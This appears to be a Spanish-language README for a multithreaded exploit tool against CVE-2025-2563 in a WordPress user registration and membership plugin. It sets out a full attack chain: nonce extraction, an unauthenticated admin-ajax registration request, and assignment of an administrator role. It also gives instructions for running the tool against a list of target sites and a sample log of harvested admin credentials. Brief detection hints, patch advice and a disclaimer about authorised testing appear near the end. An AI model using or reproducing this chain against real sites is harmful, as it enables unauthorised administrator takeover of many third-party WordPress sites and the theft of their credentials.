
Exploit de subprocesos múltiples para CVE-2025-2563 dirigido a la escalada de privilegios no autenticada en el complemento User Registration & Membership de WordPress. Automatiza el registro anónimo, el abuso de nonce y la toma de control del rol de administrador.
██╗ ██╗███████╗███████╗██████╗ ██████╗ ███████╗ ██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔══██╗██╔════╝██╔════╝ ██║ ██║███████╗█████╗ ██████╔╝ ██████╔╝█████╗ ██║ ███╗ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══██╗██╔══╝ ██║ ██║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ██║███████╗╚██████╔╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝
CVE-2025-2563 — Escalada de Privilegios No Autenticada a través del plugin de Registro de Usuario y Membresía para WordPress. Exploit de cadena completa: registro anónimo → abuso de nonce de membresía → toma de control del rol de administrador.
| Campo | Detalle |
|---|---|
| CVE | CVE-2025-2563 |
| Plugin | Registro de Usuario y Membresía |
| Versión Afectada | ≤ 4.1.1 |
| Tipo | Escalada de Privilegios No Autenticada |
| CVSS | Crítico |
| Vector | Red / Sin Autenticación Requerida |
| WordPress | Cualquier versión que ejecute el plugin |
[1] Crawl target
↓
[2] Fetch /membership-pricing/ & /membership-registration/
↓
[3] Extract form_id, membership_id, security nonce, ur_frontend_form_nonce
↓
[4] POST to /wp-admin/admin-ajax.php
action=user_registration_user_form_submit
→ Create arbitrary user account (unauthenticated)
↓
[5] Abuse membership JS nonce via ur_membership_frontend_localized_data
→ Assign administrator-level membership plan to new account
↓
[6] Verify admin access at /wp-admin/users.php & /wp-admin/plugin-install.php
↓
[7] Save credentials → NATA_admin.txt
pip install requests rich
# 1. Add targets to list.txt (one URL per line)
# 2. Run
python CVE-2025-2563.py
Entrada: list.txt
https://target1.com
https://target2.com
https://target3.com
Salida: NATA_admin.txt
[2025-04-20 08:00:00] https://target.com/wp-login.php user:natxploit_abc pass:NATA_adminSA
| Archivo | Contenido |
|---|---|
NATA_admin.txt | Credenciales de administrador confirmadas |
reg.txt | Todos los registros exitosos |
Monitoree:
/wp-admin/admin-ajax.php con action=user_registration_user_form_submit/membership-registration/ seguidas inmediatamente por asignación de membresía AJAXParche: Actualice el plugin Registro de Usuario y Membresía a la versión >= 4.1.2
Esta herramienta se publica solo para pruebas de penetración autorizadas e investigación de seguridad. El autor no se hace responsable por el mal uso. Siempre obtenga permiso explícito por escrito antes de probar.
Natan Utama — github.com/dokter69 | Telegram: @ayasyanaro